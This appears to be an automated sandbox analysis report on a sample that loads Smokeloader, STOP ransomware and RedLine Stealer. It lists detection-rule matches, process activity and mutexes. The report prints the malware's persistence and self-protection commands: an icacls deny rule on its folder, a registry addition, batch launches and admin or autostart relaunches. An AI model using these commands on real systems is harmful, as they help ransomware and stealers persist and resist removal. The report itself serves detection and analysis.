Source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2068190950.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000000.00000002.2068864914.0000000002ECB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2342341845.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.2342416415.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2068350928.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001E.00000002.3280589230.000000000CAC1000.00000020.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000002.2616958897.000000000494A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.2396309012.0000000002FC7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000029.00000002.3255503396.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.2068279346.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000029.00000002.3254939244.0000000002F2E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000002.2445927456.0000000004995000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: Process Memory Space: 33A3.exe PID: 4400, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 3556, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 3780, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 5964, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 5328, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 2104, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 2284, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 5560, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 5680, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 4276, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@38/296@18/11
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree, 9_2_00411900
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02ED2423 CreateToolhelp32Snapshot,Module32First, 0_2_02ED2423
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize, 9_2_0040D240
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\dejcbcc
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1628:120:WilError_03
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1028
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:120:WilError_03
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\B88.tmp
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\B88.bat" "
Source: unknown Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: --Admin 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: IsAutoStart 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: IsTask 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: --ForNetRes 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: IsAutoStart 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: IsTask 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: --Task 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: --AutoStart 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: --Service 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: X1P 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: --Admin 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: runas 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: x2Q 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: x*P 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: C:\Windows\ 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: D:\Windows\ 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: 7P 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: %username% 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: F:\ 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: --Admin 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: IsAutoStart 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: IsTask 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: --ForNetRes 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: IsAutoStart 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: IsTask 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: --Task 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: --AutoStart 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: --Service 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: X1P 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: --Admin 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: runas 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: x2Q 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: x*P 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: C:\Windows\ 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: D:\Windows\ 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: 7P 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: %username% 14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Command line argument: F:\ 14_2_00419F90
Source: XVM5nluelx.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File read: C:\Users\user\Searches\desktop.ini
Source: C:\Users\user\Desktop\XVM5nluelx.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: XVM5nluelx.exe ReversingLabs: Detection: 31%
Source: 33A3.exe String found in binary or memory: set-addPolicy
Source: 33A3.exe String found in binary or memory: id-cmc-addExtensions
Source: 33A3.exe String found in binary or memory: set-addPolicy
Source: 33A3.exe String found in binary or memory: id-cmc-addExtensions
Source: 33A3.exe String found in binary or memory: set-addPolicy
Source: 33A3.exe String found in binary or memory: id-cmc-addExtensions
Source: 33A3.exe String found in binary or memory: set-addPolicy
Source: 33A3.exe String found in binary or memory: id-cmc-addExtensions
Source: unknown Process created: C:\Users\user\Desktop\XVM5nluelx.exe "C:\Users\user\Desktop\XVM5nluelx.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\dejcbcc C:\Users\user\AppData\Roaming\dejcbcc
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\B88.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\33A3.exe C:\Users\user\AppData\Local\Temp\33A3.exe
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Process created: C:\Users\user\AppData\Local\Temp\33A3.exe C:\Users\user\AppData\Local\Temp\33A3.exe
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Process created: C:\Users\user\AppData\Local\Temp\33A3.exe "C:\Users\user\AppData\Local\Temp\33A3.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Process created: C:\Users\user\AppData\Local\Temp\33A3.exe "C:\Users\user\AppData\Local\Temp\33A3.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe --Task
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe --Task
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5C0B.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1028 -s 10828
Source: unknown Process created: C:\Windows\explorer.exe explorer.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\dejcbcc C:\Users\user\AppData\Roaming\dejcbcc
